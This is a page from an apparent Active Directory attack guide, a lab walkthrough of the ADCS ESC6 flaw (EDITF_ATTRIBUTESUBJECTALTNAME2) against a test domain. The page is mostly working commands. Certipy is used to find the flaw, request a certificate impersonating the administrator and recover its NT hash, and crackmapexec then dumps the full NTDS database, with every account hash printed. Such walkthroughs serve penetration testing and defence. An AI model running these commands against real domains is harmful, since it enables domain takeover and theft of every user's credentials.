Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  • EDITF_ATTRIBUTESUBJECTALTNAME2 — ESC6
  • Find the Vulnerability
  • Dump it ntds with CME
  1. Active Directory Certificate Services (ADCS)

ADCS - ESC6

PreviousADCS - ESC4NextCertifried - CVE-2022–26923

Last updated 2 years ago

EDITF_ATTRIBUTESUBJECTALTNAME2 — ESC6

Another way to supply arbitrary SANs, described in a , involves the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. As Microsoft describes, “” This means that ANY template configured for domain authentication that also allows unprivileged users to enroll (e.g., the default User template) can be abused to obtain a certificate that allows us to authenticate as a domain admin (or any other active user/machine). As this , this setting “just makes it work”, which is why it’s likely flipped in many environments by sysadmins who don’t fully understand the security implications.

  • As said on certipy page : “ESC6 is when the CA specifies the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. This flag allows the enrollee to specify an arbitrary SAN on all certificates despite a certificate template’s configuration.”

  • Because MARYLAND-CA is vulnerable to ESC6 we can do the ESC1 attack but with the user template instead of the ESC1 template even if the user template got Enrollee Supplies Subject set to false.

Find the Vulnerability

sudo certipy find -u joaquin.Pereida@maryland.local -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout
certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target salisbury.maryland.local -template User -ca MARYLAND-CA -upn administrator@maryland.local
certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@maryland.local': aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da

Dump it ntds with CME

crackmapexec smb 192.168.56.12 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da' --ntds


/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
SMB         192.168.56.12   445    BALTIMORE        [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True)
SMB         192.168.56.12   445    BALTIMORE        [+] maryland.local\administrator:54296a48cd30259cc88095373cec24da (Pwn3d!)
SMB         192.168.56.12   445    BALTIMORE        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.56.12   445    BALTIMORE        Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB         192.168.56.12   445    BALTIMORE        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.56.12   445    BALTIMORE        krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1ad253c7f9110449bd1ccbcadf2ca611:::
SMB         192.168.56.12   445    BALTIMORE        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.56.12   445    BALTIMORE        vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB         192.168.56.12   445    BALTIMORE        carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
SMB         192.168.56.12   445    BALTIMORE        marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
SMB         192.168.56.12   445    BALTIMORE        joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
SMB         192.168.56.12   445    BALTIMORE        teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
SMB         192.168.56.12   445    BALTIMORE        sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB         192.168.56.12   445    BALTIMORE        BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759:::
SMB         192.168.56.12   445    BALTIMORE        SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:12df918c6cba0ab538b68f10071a1fa5:::
SMB         192.168.56.12   445    BALTIMORE        newyork$:1105:aad3b435b51404eeaad3b435b51404ee:16827e6dccaaa8328e7092324980f207:::
SMB         192.168.56.12   445    BALTIMORE        [+] Dumped 13 NTDS hashes to /home/watchdog/.cme/logs/BALTIMORE_192.168.56.12_2023-02-26_221347.ntds of which 10 were added to the database
SMB         192.168.56.12   445    BALTIMORE        [*] To extract only enabled accounts from the output file, run the following command: 
SMB         192.168.56.12   445    BALTIMORE        [*] cat /home/watchdog/.cme/logs/BALTIMORE_192.168.56.12_2023-02-26_221347.ntds | grep -iv disabled | cut -d ':' -f

CQure Academy post
If this flag is set on the CA, any request (including when the subject is built from Active Directory®) can have user defined values in the subject alternative name.
Keyfactor post describes